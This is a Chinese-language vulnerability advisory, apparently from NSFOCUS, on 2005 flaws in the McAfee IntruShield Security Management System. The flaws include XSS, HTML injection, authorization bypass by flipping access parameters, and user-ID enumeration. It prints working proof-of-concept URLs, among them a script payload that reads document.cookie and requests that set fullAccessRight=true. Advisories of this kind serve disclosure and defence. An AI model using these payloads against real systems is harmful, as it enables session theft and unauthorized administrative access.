安全研究

安全漏洞
McAfee IntruShield安全管理系统多个安全漏洞

发布日期:2005-07-07
更新日期:2005-07-07

受影响系统:
McAfee McAfee IntruShield安全管理系统
描述:
BUGTRAQ  ID: 14167
CVE(CAN) ID: CVE-2005-2186,CVE-2005-2187,CVE-2005-2188

McAfee IntruShield安全管理系统是用于管理IntruShield传感器设备部署的高级解决方案。

McAfee IntruShield安全管理系统中存在多个漏洞:

1) 攻击者可以在MISMS中嵌入HTML,这可能允许对有效管理员帐号执行钓鱼攻击。

2) 攻击者可以在MISMS中嵌入JavaScript并在浏览管理系统用户的安全环境中执行这些嵌入的脚本。

3) 攻击者可能访问MISMS中受限制的“Generate Reports”部分,这样非特权用户就可以获取有关服务所管理的配置和IP设备设置的重要信息。

4) 攻击者可以通过在发送给系统URL中将Access选项从“false”改为“true”来确认、解除确认或删除MISMS控制台的告警。

5) 默认下,所有用户ID值在URL中都是以明文传送的,这意味着攻击者可以暴力猜测帐号。

攻击者可以利用这些漏洞远程执行代码,获得提升权限,或获取敏感信息。但是,必须有效的用户帐号才能利用这些漏洞。

<*来源:c0ntexb (c0ntexb@gmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112066594312876&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1)

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600 >  </iframe>&severity=critical&count=1

2)

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&  domainName=Demo&resourceName=<script>alert("There could be trouble ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1


3)

https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&  selectedDomain=0&fullAccessRight=true

4)

https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1

5)

https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif

建议:
厂商补丁:

McAfee
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mcafeesecurity.com/cn/products/mcafee/network_ips/management.htm

浏览次数:3250
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障